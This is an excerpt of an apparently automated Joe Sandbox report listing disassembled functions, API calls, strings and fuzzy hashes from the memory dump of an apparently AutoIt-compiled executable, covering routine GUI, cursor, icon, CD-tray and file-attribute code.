Part of subcall function 0068AB37: PtInRect.USER32(?,?,0068C014), ref: 0068ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0068C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068C6BE
_wcscat.LIBCMT ref: 0068C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0068C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0068C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0068C757
DragFinish.SHELL32(?), ref: 0068C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068C851

Strings

@GUI_DRAGFILE, xrefs: 0068C800
@GUI_DRAGID, xrefs: 0068C7C9
pbl, xrefs: 0068C79B
@GUI_DROPID, xrefs: 0068C77E

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbl
API String ID: 169749273-3710877546
Opcode ID: 54dd794532b554370ef13d4f336128f4b1b80dab6a1a3130d0f151115e7389be
Instruction ID: f329c222b3512b8e32934ac414565ee91ea8b058b6630baf230f5970b70ee070
Opcode Fuzzy Hash: 54dd794532b554370ef13d4f336128f4b1b80dab6a1a3130d0f151115e7389be
Instruction Fuzzy Hash: CA617371148301AFC705EF64CC85DAFBBEAEF89710F100A2EF595931A1DB709949CB66

Function 0065ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0065AC33

Strings

[HANDLE:, xrefs: 0065AC3F
REGEXP=, xrefs: 0065AC48
[LAST, xrefs: 0065ACE0
[ACTIVE, xrefs: 0065AC20
LAST, xrefs: 0065ABF8
[REGEXPTITLE:, xrefs: 0065AC5B
HANDLE=, xrefs: 0065AC2C
ALL, xrefs: 0065ACC7
[CLASS:, xrefs: 0065AC83
[ALL, xrefs: 0065ACD9
ACTIVE, xrefs: 0065AC0E
CLASSNAME=, xrefs: 0065AC70

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 05f7b95442b7e0d5977705cda39454127c6e025ec3f1c055aab8bb7c1a98492b
Instruction ID: 71c875abc38dfde7a008eb5a23b6fcb1673854d873caac7b697d9790abfe485d
Opcode Fuzzy Hash: 05f7b95442b7e0d5977705cda39454127c6e025ec3f1c055aab8bb7c1a98492b
Instruction Fuzzy Hash: 71319671988209ABDB94FA90ED13EEF7767AF10712F20051DF842711D1EF516F48CA5A

Function 00674FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00675013
LoadCursorW.USER32(00000000,00007F00), ref: 0067501E
LoadCursorW.USER32(00000000,00007F03), ref: 00675029
LoadCursorW.USER32(00000000,00007F8B), ref: 00675034
LoadCursorW.USER32(00000000,00007F01), ref: 0067503F
LoadCursorW.USER32(00000000,00007F81), ref: 0067504A
LoadCursorW.USER32(00000000,00007F88), ref: 00675055
LoadCursorW.USER32(00000000,00007F80), ref: 00675060
LoadCursorW.USER32(00000000,00007F86), ref: 0067506B
LoadCursorW.USER32(00000000,00007F83), ref: 00675076
LoadCursorW.USER32(00000000,00007F85), ref: 00675081
LoadCursorW.USER32(00000000,00007F82), ref: 0067508C
LoadCursorW.USER32(00000000,00007F84), ref: 00675097
LoadCursorW.USER32(00000000,00007F04), ref: 006750A2
LoadCursorW.USER32(00000000,00007F02), ref: 006750AD
LoadCursorW.USER32(00000000,00007F89), ref: 006750B8
GetCursorInfo.USER32(?), ref: 006750C8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 896869c82d692d489471fb8d79a09d0e23d2b1e8564c490d215abd9c23fce4cb
Instruction ID: 91ff080219fc737998132fe3f7f9c34f48bc2b73e7f94d0efe734b43ac630668
Opcode Fuzzy Hash: 896869c82d692d489471fb8d79a09d0e23d2b1e8564c490d215abd9c23fce4cb
Instruction Fuzzy Hash: B63135B0D483196ADF109FB68C8999FBFE9FF04750F50452AA50DE7280DA786500CFA1

Function 0068A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068A259
DestroyWindow.USER32(?,?), ref: 0068A2D3

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A382
DestroyWindow.USER32(00000000), ref: 0068A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0068A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A3F4
GetDesktopWindow.USER32 ref: 0068A40D
GetWindowRect.USER32(00000000), ref: 0068A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068A444

Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC

Strings

tooltips_class32, xrefs: 0068A346, 0068A3D4
0, xrefs: 0068A26F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: a1b1ca8c3a91ac5be1dbe36c64b648b80182c17284d5c2e81cb99cab316cfb63
Instruction ID: d9ebf8c130ec4b0627d819d0df6d4f4324aaf2003a8ce855a9465ca12bdb2be0
Opcode Fuzzy Hash: a1b1ca8c3a91ac5be1dbe36c64b648b80182c17284d5c2e81cb99cab316cfb63
Instruction Fuzzy Hash: C3718E70141205AFEB25DF68CC49FA67BE7FB89300F04461EF985872A0D771E946CB56

Function 00684392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00684424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0068446F

Strings

GETTOTALCOUNT, xrefs: 00684456
UNCHECK, xrefs: 0068464B
GETTEXT, xrefs: 006845C2
GETSELECTED, xrefs: 0068457F
EXISTS, xrefs: 006844D8
SELECT, xrefs: 00684620
ISCHECKED, xrefs: 006845F2
GETITEMCOUNT, xrefs: 00684551
CHECK, xrefs: 0068448F
COLLAPSE, xrefs: 006844B5
EXPAND, xrefs: 00684521

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 9446f8dbe8d59ed7b941571218e7c0fb8230af9c5564cb02f1f50c0db21cb718
Instruction ID: 2b659ac29f7da34c11dff269dd935568ee4e9666526547e9cf5ccf4c8e1d9910
Opcode Fuzzy Hash: 9446f8dbe8d59ed7b941571218e7c0fb8230af9c5564cb02f1f50c0db21cb718
Instruction Fuzzy Hash: E8913A702047119BCB48EF20C451AAEB7E3AF95350F44896CE8965B3A3DB31ED4ACB95

Function 0068B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,006891C2), ref: 0068B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0068B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068B9C3
FreeLibrary.KERNEL32(?), ref: 0068B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068B9DF
DestroyIcon.USER32(?,?,?,?,?,006891C2), ref: 0068B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068BA17

Part of subcall function 00622EFD: __wcsicmp_l.LIBCMT ref: 00622F86

Strings

.dll, xrefs: 0068B86D
.icl, xrefs: 0068B82A
.exe, xrefs: 0068B84A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 8e66434268ce12662bfc3d85b5f5e52e2c431babd4330d01834f8123835c855e
Instruction ID: 370ef1f5c79ea1df6557ec12c61a44c5dcfd3be07052d2f5a1d0683aecb467a9
Opcode Fuzzy Hash: 8e66434268ce12662bfc3d85b5f5e52e2c431babd4330d01834f8123835c855e
Instruction Fuzzy Hash: A461EFB1500215BAEF14EF64DC41FFE7BAAEB09711F104619FE11D62D1DB749980DBA0

Function 0066A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

CharLowerBuffW.USER32(?,?), ref: 0066A3CB
GetDriveTypeW.KERNEL32 ref: 0066A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A4C5

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

Strings

close cd wait, xrefs: 0066A4B0
open , xrefs: 0066A427
closed, xrefs: 0066A3DF, 0066A3E8
wait, xrefs: 0066A482
type cdaudio alias cd wait, xrefs: 0066A443
set cd door , xrefs: 0066A466
open, xrefs: 0066A3F2
close, xrefs: 0066A3D1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 46a45fc395fd0b613b92c7e7578a7d6bd126e38cae8e0019b4fe6a14f028037d
Instruction ID: 7ca0b3520520276957255a5504952af95763115e5f87c956557a1f6049acd0e4
Opcode Fuzzy Hash: 46a45fc395fd0b613b92c7e7578a7d6bd126e38cae8e0019b4fe6a14f028037d
Instruction Fuzzy Hash: 0B515EB15043059FC744EF14C89186BB7EAEF84718F10896DF89A67292DB31ED0ACF56

Function 0065F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0063E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0065F8DF
LoadStringW.USER32(00000000,?,0063E029,00000001), ref: 0065F8E8

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,0063E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0065F90A
LoadStringW.USER32(00000000,?,0063E029,00000001), ref: 0065F90D
__swprintf.LIBCMT ref: 0065F95D
__swprintf.LIBCMT ref: 0065F96E
_wprintf.LIBCMT ref: 0065FA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0065FA2E

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0065FA12
Line %d (File "%s"):, xrefs: 0065F957
Error: , xrefs: 0065F9E5
^ ERROR, xrefs: 0065F9C3
Line %d:, xrefs: 0065F968

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: e0a940e52d8d72e5b458d2266615318acc3001be190961e50781d0fbb445539f
Instruction ID: 369778aa20f666086c4c3f191b9c3db6376f62ec7131cb315a5cfce213800e71
Opcode Fuzzy Hash: e0a940e52d8d72e5b458d2266615318acc3001be190961e50781d0fbb445539f
Instruction Fuzzy Hash: 09414B7284011DAACF48FBE0DD86DEFB77AAF14301F100469B506721D1EA356F49CB65

Function 0068BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00689207,?,?), ref: 0068BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA85
GlobalLock.KERNEL32(00000000), ref: 0068BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0068BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00689207,?,?,00000000,?), ref: 0068BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,00692CAC,?), ref: 0068BAD7
GlobalFree.KERNEL32(00000000), ref: 0068BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0068BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0068BB36
DeleteObject.GDI32(00000000), ref: 0068BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0068BB74

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 754815e27b638bde5ec201228b3abf08136c87b43af71f8f7821fa3f5afd56ce
Instruction ID: 88e927ae9c371c8705197097023770bdaebf7edbcebc117da42c7f1a389b2b9a
Opcode Fuzzy Hash: 754815e27b638bde5ec201228b3abf08136c87b43af71f8f7821fa3f5afd56ce
Instruction Fuzzy Hash: 7A412975600204FFDB219FA5DC88EAA7BBAFF89711F105268F905D7260DB709E01CB60

Function 0066D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0066DA10
_wcscat.LIBCMT ref: 0066DA28
_wcscat.LIBCMT ref: 0066DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0066DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0066DA63
GetFileAttributesW.KERNEL32(?), ref: 0066DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0066DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0066DAA7

Strings

*.*, xrefs: 0066DAE6

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 3a08039e0597f819b0f538d361c0dd8a440700aacac93f74cefb0e67db6a5fd8
Instruction ID: 7e91e8a763651f3cc37ac347621469dfe7cf96f6618f2581f0b392d73b402016
Opcode Fuzzy Hash: 3a08039e0597f819b0f538d361c0dd8a440700aacac93f74cefb0e67db6a5fd8
Instruction Fuzzy Hash: A7816371A04241AFCB64DF64C8449ABB7EAAF89354F188D2EF889CB351D630DD45CB52

Function 0068C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068C1FC
GetFocus.USER32 ref: 0068C20C
GetDlgCtrlID.USER32(00000000), ref: 0068C217
_memset.LIBCMT ref: 0068C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0068C36D
GetMenuItemCount.USER32(?), ref: 0068C38D
GetMenuItemID.USER32(?,00000000), ref: 0068C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0068C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0068C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068C489

Strings

0, xrefs: 0068C33A

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 66027258d3881f8e03595147e454b880966260d8738ba30306f121134c96caaf
Instruction ID: 04e503479777ed58830903f9b2a68cd9d1505a4f53bc68ccd949b680d294c47f
Opcode Fuzzy Hash: 66027258d3881f8e03595147e454b880966260d8738ba30306f121134c96caaf
Instruction Fuzzy Hash: 43816D70608311AFD710EF14D894EBBBBE6FB88724F004A2DF99597291D770D945CBA2

Function 0067731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0067738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0067739B
CreateCompatibleDC.GDI32(?), ref: 006773A7
SelectObject.GDI32(00000000,?), ref: 006773B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00677408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00677444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00677468
SelectObject.GDI32(00000006,?), ref: 00677470
DeleteObject.GDI32(?), ref: 00677479
DeleteDC.GDI32(00000006), ref: 00677480
ReleaseDC.USER32(00000000,?), ref: 0067748B

Strings

(, xrefs: 00677410

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: f736124841dd2695fe476a88c6efcdbc56c34ad9e35092a04e72c733e4deda57
Instruction ID: 670dc5f12278f8f2bb3d69c6584e11d43c980b9e076143b8e655024b6f8701c2
Opcode Fuzzy Hash: f736124841dd2695fe476a88c6efcdbc56c34ad9e35092a04e72c733e4deda57
Instruction Fuzzy Hash: 7C514975904309EFCB14CFA8DC84EAEBBBAEF48310F14852DF99997211D771A940CB50

Function 00606A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00620957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00606B0C,?,00008000), ref: 00620973

Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00606BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00606CFA

Part of subcall function 0060586D: _wcscpy.LIBCMT ref: 006058A5

Part of subcall function 0062363D: _iswctype.LIBCMT ref: 00623645

Strings

#include depth exceeded. Make sure there are no recursive includes, xrefs: 0063E421
>>>AUTOIT SCRIPT<<<, xrefs: 0063E496
Bad directive syntax error, xrefs: 0063E79D
EA06, xrefs: 0063E452
Error opening the file, xrefs: 0063E43D, 0063E4B8
Unterminated string, xrefs: 0063E7E4
AU3!, xrefs: 00606B61

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 8136b30e1e8b8f64e63a0245841e2bef99711236bb5f8f19ff2776ce4b1cbab8
